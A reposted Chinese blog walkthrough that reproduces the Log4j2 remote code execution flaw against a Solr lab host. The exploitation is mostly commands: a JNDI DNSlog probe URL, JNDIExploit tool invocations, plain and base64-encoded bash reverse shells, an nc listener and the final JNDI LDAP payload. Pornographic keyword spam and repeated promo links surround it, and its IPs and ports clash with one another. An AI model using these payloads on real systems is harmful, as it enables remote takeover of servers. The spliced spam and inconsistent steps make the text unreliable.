欧美free性护士vide0shd,老熟女,一区二区三区,久久久久夜夜夜精品国产,久久久久久综合网天天,欧美成人护士h版

首頁綜合 正文
目錄

柚子快報(bào)激活碼778899分享:log4j2漏洞復(fù)現(xiàn)

柚子快報(bào)激活碼778899分享:log4j2漏洞復(fù)現(xiàn)

http://yzkb.51969.com/

Log4j2是Apachel的一個(gè)java日志框架,我們借助它進(jìn)行日志相關(guān)操作管理,然而在2021年未10g4j2爆出了遠(yuǎn)程代碼執(zhí)行漏洞,屬于嚴(yán)重等級(jí)的漏洞

1、執(zhí)行以下命令啟動(dòng)靶場環(huán)境并在瀏覽器訪問

2、在DNSlog平臺(tái)請(qǐng)求一個(gè)dns域名:

http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.649god.dnslog.cn}

直接訪問

可知版本信息1.8.0

3、反彈shell需要使用JNDIExploit.v1.2

此時(shí),

kali2024:中轉(zhuǎn)--192.168.3.232

kali2023:攻擊--192.168.3.137

centos7:靶機(jī)--192.168.3.70

首先在中轉(zhuǎn)機(jī)上使用JNDIExploit-1.2-SNAPSHOT.jar文件使用java啟動(dòng),命令如下:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.3.179

bash -i >& /dev/tcp/192.168.3.70/8080 0>&1

java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMuMTM3LzgwODAgMD4mMQ==} | {base64, -d} |bash" -A 192.168.3.137

攻擊機(jī):開啟監(jiān)聽nc -lvvp 6666

此時(shí)構(gòu)造如下命令:

http://192.168.3.70:8983/solr/admin/cores?action=${jndi:ldap://192.168.3.137:1389/0izjha}

訪問,成功反彈

http://192.168.3.70:8983為靶機(jī)的地址

192.168.3.232為中轉(zhuǎn)機(jī)地址

192.168.3.137為Kali攻擊機(jī)ip地址,此時(shí)要反彈shell

柚子快報(bào)激活碼778899分享:log4j2漏洞復(fù)現(xiàn)

http://yzkb.51969.com/

推薦閱讀

評(píng)論可見,查看隱藏內(nèi)容

本文內(nèi)容根據(jù)網(wǎng)絡(luò)資料整理,出于傳遞更多信息之目的,不代表金鑰匙跨境贊同其觀點(diǎn)和立場。

轉(zhuǎn)載請(qǐng)注明,如有侵權(quán),聯(lián)系刪除。

本文鏈接:http://gantiao.com.cn/post/19285834.html

發(fā)布評(píng)論

您暫未設(shè)置收款碼

請(qǐng)?jiān)谥黝}配置——文章設(shè)置里上傳

掃描二維碼手機(jī)訪問

文章目錄